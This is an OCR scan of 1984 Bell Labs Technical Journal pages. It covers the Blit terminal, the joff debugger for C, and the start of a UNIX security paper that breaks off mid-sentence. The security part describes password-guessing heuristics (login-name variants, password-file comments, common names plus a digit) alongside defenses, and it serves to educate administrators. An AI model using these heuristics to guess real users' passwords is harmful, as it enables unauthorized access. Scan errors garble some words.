wrote the eighth edition version of mpx itself. Thanks are also due to Sally Browning, Tom Cargill, Greg Chesson, Joe Condon, Dave Ditzel, Steve Johnson, Andrew Hume, John Reiser, and Dennis Ritchie, each of whom provided indispensable assistance and enthusiastic encourage- ment. REFERENCES 1. D. H. Ingalls, “The Smalltalk Graphics Kernel,” Byte, 6 (August 1981), pp. 168-94. 2. R. Pike, B. N. Locanthi, and J. F. Reiser, “Hardware-Software Tradeoffs for Bitmap Graphics on the Blit,” Software — Practice & Experience, 15 (March 1985). 3. R. Pike, “Graphics in Overlapping Bitmap Layers,” Trans. Graph., 2, No. 2 (1983), pp. 135-60. 4. C. P. Thacker et al., “Alto: A Personal Computer,” CSL-79-11, August 1979, Xerox Corp. 5. W. N. Joy, R. S. Fabry, and K. Sklower, UNIX 4.1BSD Programmer’s Manual. 6. T. A. Cargill, “The Blit Debugger,” J. Systems and Software, 3 , No. 4 (December 1983), pp. 277-84. 7. R. Pike, unpublished work. 8. B. W. Kernighan, “Pic: A Language for Typesetting Graphics,” Software — Practice & Experience, 12 (January 1982), pp. 1-20. 9. D. M. Ritchie, “The UNIX System: The Evolution of the UNIX Time-sharing System,” AT&T Bell Lab. Tech. J., this issue. 52 TECHNICAL JOURNAL, OCTOBER 1984 AUTHOR Rob Pike, AT&T Bell Laboratories, 1980—. As a Member of Technical Staff Mr. Pike’s best-known work has been as co -developer of the Blit bitmap graphics terminal. His research interests include statistical mechanics and cosmology; his practical interests involve interactive graphics hardware and software. GRAPHICS TERMINAL 53 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: Debugging C Programs With the Blit By T. A. CARGILL* (Manuscript received August 1, 1983) The Blit terminal is changing the way we debug C programs. Using multiple virtual terminals on the Blit, a programmer can interact simultaneously with several of the tools needed when debugging. This makes existing tools more useful and influences the design of new tools. In particular, the Blit cleanly separates the programmer’s communication with a debugger from communi- cation with the program being debugged. Moreover, jof f, a debugger for C programs that run in the Blit, demonstrates the advantage of operating a debugger asynchronously with the subject process and the effectiveness of a source-level user interface based on pop-up menus. The graphics user interface supports “pointer chasing” through arbitrary data structures and graphical display of graphics data objects. I. INTRODUCTION This paper begins with a synopsis of debugging technology (see surveys published by Model and Myers ). 1,2 This is followed by a discussion of the Blit terminal’s effect on debugging C programs running under the UNIX™ operating system and then an example of joff, a debugger for C programs running on the Blit itself. The observations are pertinent to other languages used on UNIX systems, but only C has been used on the Blit. For programs on a UNIX system * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 54 host, the multiplexed virtual terminals of the Blit increase the effec- tiveness of debugging with the standard tools. The Blit’s hardware and software make its debugger quite unlike the debuggers used for UNIX programs. Several small scenarios illustrate tools and tech- niques used in debugging. (These examples are unrealistic and there- fore require the reader to extrapolate to the effect in real debugging.) Some appreciation of the Blit terminal 3 and a reading knowledge of C 4 are assumed. II. DEBUGGING TOOLS Debugging is a complicated activity. A program isn’t doing what it should, and the programmer has to find out what it is doing, so that the problem may be rectified or documented. Locating and understand- ing the errant part of the program is usually much harder than deciding how to correct the problem. Initially, the programmer does not even know where to look; only the symptoms are known — the program’s external behavior. The pro- grammer constructs hypotheses about what may be wrong in the program and devises ways to test them. The results of each test are clues about the program that lead to other hypotheses. The more specific the hypotheses become, the more information the programmer needs about the internal behavior of the program, which is not nor- mally observable. A debugger is a tool for observing the internal behavior of a program. Generally, a debugger lets the programmer examine the state of the program at some point in its execution. Debuggers present the state of the subject program in different ways. They vary in the level of abstraction at which the program is viewed, from source programming language to machine language, and in the degree of user interaction: • The most primitive debuggers give dumps : they print the contents of every memory location in the address space of the program at the time of a failure. The subject program executes no further; there is only information about its final state. • Other debuggers trace the program: they print messages about selected events that occur in the execution of the program. Typical events are variable assignments and function calls. If the set of events must be fixed when the program is compiled or starts to run, the debugger is a batch tool, even if it runs in time sharing. • Interactive debuggers involve the programmer in the execution of the program: when an event occurs the programmer enters a dialogue with the debugger and interactively examines the state of the program or modifies the set of events before restarting the program. The interactive nature is a great advantage; it is only after seeing the values of some variables that the programmer knows where to DEBUGGING WITH BLIT TERMINAL 55 look for other critical data. Each run of the subject yields more information than it would with a batch debugger. The characteristics of a debugger are most influenced by the archi- tecture of the machine executing the subject program; the machine architecture determines the ease with which the debugger can access and control the internal state of the program. An interpreter, a software machine, can easily provide ample support for a debugger. Hardware processors usually provide much less support. For example, with an interpreter it may be easy to implement a class of events based on changes in the values of variables by invoking the debugger after the completion of each statement. Hardware processors vary but may provide no more than a breakpoint event, halting the program when it reaches a particular instruction. Debuggers are also influenced by the architecture of their operating environment. Under an operating system that permits users to execute only a single process, the debugger and its subject must be merged into one process. Several reasons make it undesirable to combine the debugger and the subject into a single process: 1. The debugger’s presence in the subject process may result in different behavior, even to the point where the bug is no longer apparent. 2. The debugger is not protected; the subject process may overwrite it. 3. If process address space is limited, there may not be room for the debugger. 4. If the debugger and the subject must be bound before the subject starts to execute, the debugger cannot be invoked after something goes wrong in a production program. If possible, it is therefore better to make the debugger a separate process, supported by operating system primitives for accessing the subject process. These reasons for making the debugger a separate process have more to do with the implementation of the debugger than with its use. The programmer still perceives the debugger and subject as united if communication with them is through a single terminal. To the pro- grammer, the drawbacks of a shared terminal are: 1. The process involved with each line of input and output must be determined. 2. The shared terminal may not behave properly if the debugger and the subject require it to operate in different modes. 3. Even in the same mode, Input/Output (I/O) may not interleave properly because of unflushed buffers, cursor control, and so on. The solution is to use two terminals, one for the debugger and one for the subject. But whether the two processes can drive separate terminals 56 TECHNICAL JOURNAL, OCTOBER 1984 depends on the operating system again, and also on the availability of terminals. A debugger is only one of the tools used in debugging. The program- mer uses a full set of software tools to manipulate a great deal of information: the source program, data files, test results, other pro- grams, subroutine libraries, documentation, news bulletins, mail mes- sages, etc. Even though experienced programmers write programs with debugging in mind, they can rarely plan much of how to tackle a particular bug. It is hard to anticipate the course of a debugging session or what information will be needed; the results of each step determine where to look, what to consider, and what tool to use next. A dextrous programmer may rapidly apply a wide variety of tools. III. USING THE BLIT TO DEBUG UNIX PROGRAMS The Blit can multiplex a number of UNIX system shells. 3 Each shell runs in its own layer, a rectangular region of the screen that, by default, behaves like an ASCII terminal. The shells run asynchro- nously, writing to their respective layers at any time, ignorant of the multiplexing. The user creates, moves, reshapes, and deletes layers with a graphics mouse. The mouse also controls the way in which the layers overlap, and it selects the current layer, to which input from the keyboard is directed. Any obscured portion of an overlapped layer remains active; it can be written to at any time, and is restored when the layers are rearranged to make it reappear. The effect, for the user and the UNIX system alike, is as though the user had an array of terminals. A layer can also be tailored for an application with an arbitrary graphics program, down loaded from the UNIX system to run in the Blit’s processor. For example, j im, a mouse-based multifile text editor, down loads its user interface process to a Blit layer. 3 The Blit has a considerable impact on debugging, even when no debugger is used, as in the ever-popular method of debugging C programs by inserting print statements. When a program is being debugged, the ability to run multiple streams of UNIX system com- mands simultaneously is useful because the programmer has to per- form so many different tasks. The subject program can run in one layer while the source text of the program is viewed in another layer. Perusing the source text and following the behavior of the subject program simultaneously is a great help, even if the text editor only displays text from one file at a time. The text editor written for the Blit, j im, makes it possible to flip rapidly among as many as 20 files, and arrange the files in overlapping windows within its layer. In a layer occupying less than half of the Blit’s 800 X 1024 pixel display, j im can show a block of source text with a function call from one DEBUGGING WITH BLIT TERMINAL 57 source file, the body of the called function from another, and a set of definitions from a common header file. None of the context of an editor or the subject program is lost when other tools must be used. Examples of the kind of tools that might be needed at any time are: grep — to find occurrences of an identifier, d i f f — to see how a file has changed, man — to obtain a section of the UNIX system manual. If executing a command takes a long time, the programmer need not wait for output before doing something else; each shell and tool responds independently. Without some discipline this can become chaotic, and it takes a little practice to use the Blit’s layers to the best effect. Many programmers establish an idiosyncratic layout of the Blit screen, with fixed tools in layers at fixed positions. It is then easy to keep track of a few extra layers, handling other tasks as they arise. Where they would not otherwise work, print statements can still be used for debugging on a Blit. Consider using print statements to debug a conventional UNIX system screen editor running behind a Blit layer. (A Blit layer can be programmed to emulate an arbitrary ASCII terminal.) As the editor moves the cursor around the screen, print statement output will overwrite editor text and vice versa; the editor also will lose track of the cursor’s location. However, on the Blit the trace can be directed to a different layer, as follows: 1. The debugging output is written to another stream, say the standard error device: fprintf( stderr, ”keyboard( ) = %o\n" , c); 2. The “pseudo-teletype” device associated with the layer to receive the trace is determined by using the tty command in that layer: $ tty /de v/pt/pt 26 3. The editor’s standard error output is directed to that device: $ editor 2>/dev/pt/pt26 The editor now executes in one layer and the trace output scrolls by in another layer; there is no interference. Flow control characters from the keyboard can stop and start the trace output to prevent it from scrolling away too quickly. Of course stopping the output from the trace will not stop the editor until it blocks on full buffers. In this case the print statements write unconditionally to the layer receiving the trace. A conditional trace is possible by adding a level of software to remove unwanted output. A file of directives, supplied by 58 TECHNICAL JOURNAL, OCTOBER 1984 the programmer, can be used to control which print statements are active and which should be ignored. Checking the control file period- ically to see if it has changed provides asynchronous control of the trace; the control file can be edited (in a third layer) while the program is running, to select dynamically which trace output is produced. So far, there has been no mention of the UNIX system debuggers adb and sdb. These tools are functionally alike. Both debuggers examine dump files from aborted processes and interactively control the execution of processes to be debugged. They differ in the level at which the subject program is interpreted: adb presents the program in terms of symbolic assembly language; sdb presents it in terms of its C source text. The UNIX system supports interactive debuggers as separate processes, but the subject must be a child process, created by the debugger. For adb and sdb, isolation of the subject’s I/O is handled easily. Both debuggers have a run command to start the execution of the subject process. The command takes arguments to be passed to the process, including I/O redirection. So the standard I/O devices for the subject process can be chosen to make it communicate with another layer. As with the other examples, the UNIX system I/O abstraction makes the technique possible. The Blit merely places a personal set of asynchronous devices at the programmer’s disposal. IV. DEBUGGING BLIT PROGRAMS C programs down loaded into the Blit must also be debugged. The Blit environment is quite unlike the UNIX system environment and affects the way Blit programs are debugged: • Control flow in many Blit programs is driven by asynchronous input from the mouse, the keyboard, the clock, and a corresponding process on the host. This introduces some of the problems of debugging real- time software, particularly the difficulty of recreating conditions that produce an error. However, one classic bane of real-time pro- grams is absent — response to interrupts is handled entirely by Blit system software. • The primitive operations of the layer in which a program runs are those of bitmap graphics, not those of an ASCII terminal. A print statement only works if the program incorporates a set of output routines that interact properly with the graphics. • The Blit has no memory management. Addressing errors may not be detected before a process has overwritten memory other than its own. However, one common addressing fault, indirection through location zero, is trapped by hardware. • There is no preemptive scheduling. A looping process seizes the DEBUGGING WITH BLIT TERMINAL 59 processor; this prevents other processes from running. When this happens a special key on the keyboard must be used to kill the looping process. The j o f f debugger is the principal tool for debugging Blit processes. It is described more fully in Ref. 5, which includes some details of its implementation. Jof f is quite unlike the UNIX system debuggers in the way it interacts with the programmer and the subject process. It is invoked in its own layer before being bound to the subject process to be examined. In a layer the command joff invokes the UNIX system process of joff, which immediately down loads the part of joff that runs in the Blit. Once loaded, joff is in an idle state with no layer to debug, indicated by the message in the status line at the top of its layer. The part of the display that has changed is underlined. The remainder of the joff layer scrolls text up the screen and off the top when it fills. The “ 2 in the scrolling region is a prompt for a keyboard command. In fact, keyboard commands are used very little; all of the common commands are from the pop-up menu on the right- hand mouse button. At the outset, the menu is just: layer quit If layer is picked, the cursor changes to a bullseye icon. Moving the bullseye to a layer and pressing the right-hand button selects the process running in that layer as the subject of joff. Assume the layer selected is running the Blit text editor, jim. By examining the argu- ments with which j im was invoked, joff attempts to determine the host object file from which the process was down loaded, in order to find the symbol tables. The name of the object file should be element 0 of a vector of arguments, known by convention as argv, passed to the function main. This is printed in the scrolling area followed by a prompt, with the cursor switched to an icon calling for a menu selection: 60 TECHNICAL JOURNAL, OCTOBER 1984 argv [0] none keyboard The expected response is argv [ 0 ] , but the other entries permit the special cases of proceeding without symbol tables, or entering the name of another file from the keyboard. Having successfully bound itself to j im, jof f displays the state of its subject in the status line: In this case jim is running, that is, executing normally. If jim were stopped because of a run-time error or suspended by the down-loader before starting to execute, it would be selected as the subject in the same manner. The right button menu is now: layer quit breakpts globals halt Notice that layer is still there; jof f can be switched to another process at any time. Three new entries have appeared: breakpts — to set and clear breakpoints, globals — to examine global variables, halt — to suspend the subject process. DEBUGGING WITH BLIT TERMINAL 61 A menu entry appears only when its use is valid. There is no need to breakpoint or halt j im before using globals to see the values of its global variables. Picking globals changes the menu on the right button to: Drect gib F_rectf gib Jdisplay gib Null gib P gib _str ing gib boxcurs gib bullseye gib butf unc gib complete gib current gib deadmouse gib This shows only the top 12 items from a sorted list of the 40 global variables of j im. A scroll bar (not shown) beside the menu scrolls the 12-item window quickly through the full list. Each variable is identified as global by the gib tag; showing the class of each variable is needed to resolve ambiguity in some menus. Picking a variable from this menu, for example, current, requests that its type and value be displayed; current is a pointer to the portion of text displayed from the file currently being edited by j im: running argv[0] = /usr/blit/mbin/j im.m struct Textframe * : current=53 1 8 0 struct Textframe * : current? Note that there was no need to refer to the source text of j im to find this variable. To compose this entire example I used only jof f to feel aound inside j im until I found interesting objects. Of course the blind alleys have been removed from the transcript. In general, it is quite practical to examine the data structures in a working program without reference to the source text. The value of current is a pointer to a Textframe 1 " structure at f To ease reading, license is taken with the length of identifiers. In the symbol tables, all identifiers are truncated to eight characters. 62 TECHNICAL JOURNAL, OCTOBER 1984 address 53180. The prompt is an invitation to use a menu to construct an expression based on current, and examine the data structure. This menu begins: Textf rame {— } ->rect — >scrollre — >totalrec — >str — >s 1 — >s2 — >scrolly — >f ile — >obscure<3 Each entry is an expression in which tilde represents the active expression, current. The rectangle where text is displayed is stored in the rect field of a Textframe structure, current— >rect, selected by picking — >rect: running argv[0] = /usr/blit/mbin/j im.m struct Textframe * : current=5 3 1 8 0 struct Rectangle : current->rect? Now the active expression is a Rectangle structure. No value has been shown — it is not a scalar or a pointer. There is a new prompt to extend the expression and the menu is: Rectangle {—} —.origin — . corner %outline ( — ) newf rame ( — ) rXOR(-) Rectangle {—}, at the top of the menu, is not a C expression. It is a request to display each field of the structure and its substructures, DEBUGGING WITH BLIT TERMINAL 63 recursively. The standard Blit representation of a rectangle is struct Rectangle: typedef struct Point { short x; short y; } Point ; , typedef struct Rectangle ( Point origin; Point corner ; } Rectangle ; Three functions — %outline( ), newframe( ), rXOR( ) — also appear in the menu, for reasons discussed below. Picking Rectan- gle {~} produces: running argv [0] = /usr/bl it/mb in/ j im.m struct Textframe * : current=53 18 0 current->rect=|or igin=fx=2 7 , y=452) , corner = {x=78 7 L y=98 4) } struct Rectangle: current->rect ? This selection has not moved deeper into the data structure and current->rect reappears as the prompt, with the same menu. Picking origin gives: running argv[0] = /usr/bl it/mbin/j im .m struct Textframe * : current=5 3 1 8 0 current -> rect = {origin = jx = 27, y = 452}, corner = jx=78 7 , y=98 4) ) struct Point; current->rect .origin? and the menu for a Point: Pointful ~ . x ~.y %point (~) pttof rame ( — ) 64 TECHNICAL JOURNAL, OCTOBER 1984 In this menu, %point(~), and in the previous menu, %out- 1 ine ( — ) , are examples of functions built into jof f for graphically displaying the standard Blit graphics data structures. A point is shown graphically by a flashing a cross hair at its position on the screen, and a Rectangle by drawing its outline in exclusive-or mode. Graphic display of graphics objects is the natural way to debug graphics programs; many bugs are immediately apparent. For example, it might be obvious from an image that a rectangle has been rotated and translated, an observation that might not emerge from the numeric coordinates. The Point menu also contains pttof rame ( ~ ) . This is the func- tion in jimthat maps a screen position to a pointer to the Text frame covering the position; it determines to which of the jim files the mouse is pointing: Textframe *pttof rame ( pt ) Point pt ; This function is included by virtue of being applicable, that is, its only argument matches the type of the active expression. In general, this brings into the menu many useful functions, such as coordinate transformers and special display functions. Picking pttof rame(~) makes pttof rame ( current->rect .origin ) the new active expression and evaluates it: running argv[0] = /usr/bl it/mbin/ j im . m struct Textframe * : current=5 3 1 8 0 current->rect=jor igin=jx=2 7 , y=4 52} , corner = {x = 787 ,y=984}} struct Textframe * : pttof rame ( currents rect.origin)=53180 struct Textframe * : pttof rame ( current-> rect . origin ) ? All is well — the pointer returned by ptto frame is the value of current, 53180. Throughout this interaction with joff, jim continues to run — idling, waiting for mouse or keyboard input, its data structures un- changing. At any time it is possible to switch layers and interact with j im to manipulate it and see how it behaves. With j im executing asynchronously, joff does not try to present a consistent view of the internal state of jim; each expression is evaluated separately and reflects the values of the jim variables at the time of evaluation. To guarantee a consistent view, jim must be suspended, by using the halt or breakpts command from the main menu. Picking DEBUGGING WITH BLIT TERMINAL 65 breakpts yields a menu containing the one hundred functions in jim, beginning: gcalloc( ) Rectf ( ) Send( ) addstring( ) adjustnames( ) box( ) buttonhit( ) buttons ( ) centerf ) charofpt( ) closeall( ) closeframe( ) Picking one of the functions, say box ( ), produces a further menu for setting breakpoints: call return both > none The “>” tag on none indicates that no breakpoints have yet been set on box. Picking call sets a breakpoint on any call to box. Reshaping the current text frame in jim results in a call to box, to clear a rectangle and draw a border around it: box ( t ) Textf rame *t ; Next, jof f announces the breakpoint in the status line: argv[0]= /user/bl it/mbin/ j im . m struct Textframe * : current=53 1 8 0 current->rect={origin={x=2 7 , y=4 5 2} , corner = jx=78 7 , y=98 4} j struct Textframe * : pttof rame ( current-> rect.origin)=53180 Correctly, the box argument, t, has the same value as current. With jim suspended, the jof f menu becomes richer: 66 TECHNICAL JOURNAL, OCTOBER 1984 The new entries are: stmt step — to execute one source statement from the subject, go — to restart the subject, traceback — to list the functions on the callstack, function — to select the current function from the callstack, box( ) vars — to examine local variables in the current function, box ( ), A menu of local variables behaves like the menu of global variables. The current function can be changed by picking function from the main menu. This produces a menu of the functions on the callstack: Picking dodraw( ), for example, makes it the current function; dodraw( ) vars then appears in the main menu and its local variables are accessible instead of those of the box. Though far from exhaustive, this demonstration of jof f empha- sizes the characteristics that make it an effective tool: 1. It is bound dynamically to an arbitrary subject process, in any state. 2. It executes asynchronously with its subject. 3. A simple, mouse-based user interface supports all the basic commands and expressions for “pointer chasing.” 4. Graphics data are displayed graphically. V. DEBUGGING DISTRIBUTED PROGRAMS Applications for the Blit are usually composed of two communicat- ing processes, one running on the Blit processor and one running in the UNIX system. The example above ignored the other process of j im — managing the files on the host. There is no difficulty when both processes must be debugged simultaneously. Debugging the UNIX DEBUGGING WITH BLIT TERMINAL 67 system process does not interfere with debugging the Blit process. None of the debugging techniques makes any assumption about what is happening elsewhere. For example, if the UNIX system process is executed under sdb, and jof f is applied to the Blit process, three layers are used: one for the application and two for debuggers. Neither debugger is aware of the other. VI. CONCLUSION Using the Blit to debug UNIX programs makes existing debugging tools and techniques more effective. The Blit’s multiple virtual ter- minals make it easy to exploit the UNIX system’s inherent character. Multiple shells help to handle the diversity of tasks involved in debugging. I/O on the UNIX system cleanly isolates debugging activity from the program’s normal communications. A debugger for C programs on the Blit takes advantage of the Blit’s hardware/software architecture to provide more function and a better user interface than the UNIX system debuggers. The Blit debugger is bound dynamically to a running process and then executes asynchron- ously beside it. With a menu-based user interface driven by the mouse, the keyboard is rarely needed, even when using expressions to examine complex data structures. VII. ACKNOWLEDGMENTS I wish to thank Brian Kernighan and Rob Pike for their comments on drafts of this paper. REFERENCES 1. M. L. Model, “Monitoring Systems Behavior in a Complex Computational Environ- ment,” CSL-79-1, Xerox Corp., 1979. 2. B. A. Myers, “Displaying Data Structures for Interactive Debugging,” CSL-80-7, Xerox Corp., 1980. 3. R. Pike, “The UNIX System: The Blit: A Multiplexed Graphics Terminal,” AT&T Bell Lab. Tech. J., this issue. 4. B. W. Kernighan and D. M. Ritchie, The C Programming Language, Englewood Cliffs, NJ: Prentice-Hall, 1978. 5. T. A. Cargill, “The Blit Debugger,” J. of Svst. Software, 3, No. 4 (December 1983), pp. 277-84. AUTHOR Thomas A. Cargill, B.S. (Mathematics/Computer Science), 1973, University of Reading, England; M. Math., 1975, and Ph.D., (Computer Science), 1979, University of Waterloo, Ontario; AT&T Bell Laboratories, 1982 — . Mr. Cargill was Assistant Professor at the University of Waterloo from 1980 to 1981. At AT&T Bell Laboratories he is a member of the Computing Science Research Center. His research interests are in software support for software develop- ment. 68 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System UNIX Operating System Security By F. T. GRAMPP* and R. H. MORRIS* (Manuscript received February 7, 1984) Computing systems that are easy to access and that facilitate communica- tion with other systems are by their nature difficult to secure. Most often, though, the level of security that is actually achieved is far below what it could be. This is due to many factors, the most important of which are the knowledge and attitudes of the administrators and users of such systems. We discuss here some of the security hazards of the UNIX ™ operating system, and we suggest ways to protect against them, in the hope that an educated community of users will lead to a level of protection that is stronger, but far more importantly, that represents a reasonable and thoughtful balance between security and ease of use of the system. We will not construct parallel examples for other systems, but we encourage readers to do so for themselves. I. INTRODUCTION This paper is aimed primarily at a technical audience and, for that very reason, its usefulness as a tutorial for increased computer system security is diminished. By far, the most important handles to computer security and, indeed, to information security, generally, are: • Physical control of one’s premises and computer facilities • Management commitment to security objectives • Education of employees as to what is expected of them * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 69 • The existence of administrative procedures aimed at increased security. Unless each of these basics is in place, all of the technical solutions, the special hardware, the software safeguards, and the like are utterly meaningless. We will not address these issues to any great extent in this paper, but we mean to stress our firm conviction that no level of security whatever can be achieved without them. In discussing the status of security on the various versions of the UNIX operating system, we will try to place our observations in a wider context than just the UNIX system or one particular version of the UNIX system. UNIX system security is neither better nor worse than that of other systems. Any system that provides the same facilities as the UNIX system will necessarily have similar hazards. From its inception, the UNIX system was designed to be user friendly, and most decisions that pitted security against ease of use were heavily weighted in favor of ease of use. The result has been that the UNIX system has become a fertile test bed for the development of reasonable security procedures that interfere to the minimum possible extent with ease of use. The major weakness of any information system such as the UNIX system resides in the habits and attitudes of the user community. Naivete and carelessness will produce awful security under almost any conditions. It is easy to run a secure computer system. You merely have to disconnect all dial-up connections and permit only direct-wired ter- minals, put the machine and its terminals in a shielded room, and post a guard at the door. There are in fact many examples of UNIX systems that are run under exactly these conditions, principally sys- tems that contain classified or sensitive defense information. There are a number of options, implemented either in hardware or in software, that provide a measure of security that is almost this good. Examples are systems that only respond to a dial-up call by calling back on a preassigned number. Many commercially available operating systems make it essentially impossible to create or install any user software or application software without administrative help; some other systems make it virtually impossible to read files belonging to another user, even when the users want to cooperate in their work. All these measures work by restricting access to the system and by reducing the powers that the system gives it users. The UNIX system was designed to increase, not decrease, the power and flexibility available to its users. It was designed to be easily accessible and to facilitate communication within its user community. Most UNIX systems, not surprisingly, are of the dial-up variety. They provide their users with a general programming ability — to create, install, and 70 TECHNICAL JOURNAL, OCTOBER 1984 use their own programs. All but a few of their files are at least readable by anybody, and most such systems have access to thousands of other systems via remote mail and file transfer facilities. That is, they use the UNIX system as its creators intended it to be used. Such open systems cannot ever be made secure in any strong sense; that is, they are unfit for applications involving classified government information, corporate accounting, records relating to individual pri- vacy, and the like. Security, though, is not an absolute matter; there are tolerable levels of insecurity and there are balances to be struck, not only between security and accessibility but also between the cost of security measures and the risk or exposure associated with the information being protected. By homely analogy, most family silver- ware is stored in a cabinet in a house with a lockable door. It is not stored in a box on the front lawn for obvious reasons, but neither is it stored in a bank vault, where it would be much safer than at home, but where it could not easily be used and enjoyed. The insecurity of keeping it at home is both tolerable and appropriate. (Neither of the authors, by the way, keeps any silver in his home.) More homely yet as an example, the notion that firewood, though a commodity of considerable value, might be stored in a bank vault is simply ludicrous. The same balances are appropriate when it is information that is being protected. Most UNIX systems are far less secure than they can and should be. This unwarranted insecurity is largely caused by complacency and by the use of concealment as a security measure. The administrators do not want word of security problems to be circulated. The bad guys agree, but for different reasons. This attitude produces an unhealthy situation in which administrators and users alike are uninformed about security issues. Much silverware is left on the lawn, and only the bad guys are well informed about the exposure and the risks. Concealment is not security. The intent of this article is to survey at least the better-known security hazards associated with the UNIX system, and to suggest ways in which security can be improved without greatly diminishing the usefulness of the system to its authorized users. Topics to be covered are: 1. The insecure nature of passwords 2. Protection of files 3. Special privileges and responsibilities of administrators 4. Burglary tools, and protection against them 5. Networking hazards 6. Data encryption. All these will be discussed in the context of a community of users who are largely naive about security issues. SYSTEM SECURITY 71 There is nothing in the above list that is specific to the UNIX system. All of the problems that will be discussed here are system- dependent instances of far more general problems that appear in other forms on other systems. It is inappropriate to construct parallel exhibits from other systems here, but readers might find it rewarding to do this themselves. Finally, there was more than a little trepidation about publishing this article. There is a fine line between helping administrators protect their systems and providing a cookbook for bad guys. The consensus of the authors and reviewers is that the information presented here is well known: the bad guys know it well, and a more favorable distri- bution of this knowledge is desirable. II. PASSWORD SECURITY The most important, and usually the only, barrier to the unauthor- ized use of a UNIX system is the password that a user must type in order to gain access to the system. Much attention has been paid to making the UNIX password scheme as secure as possible against would-be intruders . 1 The result is a password file in which only encrypted passwords are kept. A person logging into the system is asked for a password. The password is then encrypted with a one-way transformation, and compared to the encrypted password previously stored in the file. Access is permitted only if the two match. An advantage of this system of password control is that there is no record anywhere of the user’s password. No method appears to be known to extract a user’s password from the encrypted version that is stored. The one-way encryption has proven to be good enough to thwart a brute-force attack. In practice it is easy to write programs that are extremely successful at extracting passwords from password files, and that are also very economical to run. They operate, however, by an indirect method that amounts to guessing what a user s password might be, emu. men trying over anu over until the correct one is found. Such programs are commonly called password crackers. They were virtually unknown five years ago, but are widely known today. They work by encrypting a good guess as to what a person’s password might be, and comparing this with the encrypted password in the file. Good guesses can be made without any personal knowledge of the people listed in the password file since the file itself provides clues. Each line therein contains, in addition to the encrypted password, the user’s login name, home directory, login shell, and, perhaps, some comments. The most important clue is the login name. People who are naive about security issues very often use login names or variants thereof as passwords. For example, if the login name is abc, then abc, eba, and 72 TECHNICAL JOURNAL, OCTOBER 1984 abcabc are excellent candidates for passwords. Experiments involving over one hundred password files have shown that a program that uses only these three guesses requires several minutes of minicomputer time to process a typical password file, and can be counted on to deliver between 8 and 30 percent of the passwords in cases where neither users nor system administrators have been security-conscious. Other clues can also be had from the password file. There is a comments field that is used in most systems to provide information about a user. It usually contains things like surname, given name, address, telephone number, project name, and so on, all of which can be extremely rewarding to try. Finally, if an intruder knows something about the people using a machine, a whole new set of candidates is available. Family and friends’ names, auto registration numbers, hobbies, and pets are particularly productive categories to try interactively in the unlikely event that a purely mechanical scan of the password file turns out to be disappoint- ing. Once the hazards are known, remedial steps can be taken to bolster password security. The following are known to be helpful: 1. Make it difficult for outsiders to obtain a copy of a machine’s password file. An intruder who is denied a copy of the file must resort to dialing into the target machine and making guesses interactively via the normal login sequence. This takes much more time than simply running a cracker program on one’s own machine. Actual login at- tempts are likely to be expensive, and greatly increase the chance that the intrusion attempt will be discovered by audit software. There is, of course, little that can be done to prevent a malicious insider from shipping the file out the door; but at least steps should be taken so that an outsider cannot use networking arrangements to cause the password file to be shipped out in a response to a request from outside. 2. Remove the encrypted passwords from the password file and place them in a parallel file that is unreadable to the general public and to networking programs like uucp. A considerate touch here is to replace the encrypted fields in the password file with random strings of the proper length and in the alphabet of encrypted passwords. This has the potential for not interfering with legitimate programs that might use the file, and wasting large amounts of an intruder’s time. 3. Likewise, keep the comment field elsewhere. Besides removing useful clues, this has the benign side effect of shortening the password file considerably, thereby speeding up programs like is that search it sequentially. 4. Modify the passwd program to prevent users from installing easily derivable passwords such as abcabc. 5. Educate users about bad passwords and good passwords. One SYSTEM SECURITY 73 recipe for good passwords is to pick some common word that is easily remembered but in no way associated with its owner and then to botch it in some way so that it will not be found in a dictionary (e.g., by misspelling it, adding punctuation, and so on). An alternative approach is to assign passwords to users, rather than letting them choose their own. Both methods have weaknesses. Left to their own ways, some people will still use cute doggie names as passwords. What is far more serious is that if randomly generated passwords are assigned, most people will write them down somewhere, often in very obvious places. The former approach seems to be the safer. It takes continuing ingenuity to keep up with prevailing silly prac- tices in choosing passwords. Several years ago, new software was distributed that required all new passwords to contain at least six characters and at least one nonalphabetic character. (In fact, it rejected both purely alphabetic and purely numeric passwords.) The authors made a survey of several dozen local machines, using as trial passwords a collection of the 20 most common female first names, each followed by a single digit. The total number of passwords tried was, therefore, 200. At least one of these 200 passwords turned out to be a valid password on every machine surveyed. III. FILES AND FILE SYSTEMS Every file in a UNIX file system has associated with it a set of permissions that specifies who can access the file and how. The permissions are kept in a 9-bit field that is part of a variable called mode , which is part of a larger structure called an i-node , which describes the file. There is a one-to-one correspondence between files and i-nodes. (To simplify matters, no distinction will be made between ordinary files, directories, and special files, unless a distinction is needed.) The permission bits specify read, write, and execute permissions for the owner of the file, others in the owner’s group, and everybody else. In UNIX software and writings about it, the permissions field is most often presented as either a three-digit octal number or a nine-character string. For example, the mode of a file that can be read, written, or executed by its owner, read and executed by members of the owner’s group, and read by everybody else would be 754 or rwxr-xr — . Both notations will be used here, as appropriate. The algorithm used to determine permissions is this: if (user is owner) { if(permissions are set) it’s ok else quit. 74 TECHNICAL JOURNAL, OCTOBER 1984 if(user is in owner’s group) { if(permissions are set) it’s ok else quit. t if(permissions are set) it’s ok. Note especially that the algorithm does not look for all possible conditions, in a hierarchical sense, in which a user might have access to a file. This is done so that a person can create a file whose access permissions are not “kept in the family.” For instance, a file whose mode is set to 007 ( rxw) can be read, written, and executed by anyone except its owner and members of its owner’s group. All such permission checking is bypassed if the user is the super- user. We must mention two additional things about directories. First, since a directory cannot be executed, the bits that would be used to specify execute permissions are instead used to specify search permis- sions, that is, the ability to climb into a directory or to use it as a component of a path name. Second, underlying directory permissions can adversely affect the safety of seemingly protected files. Suppose that d is a directory whose mode is 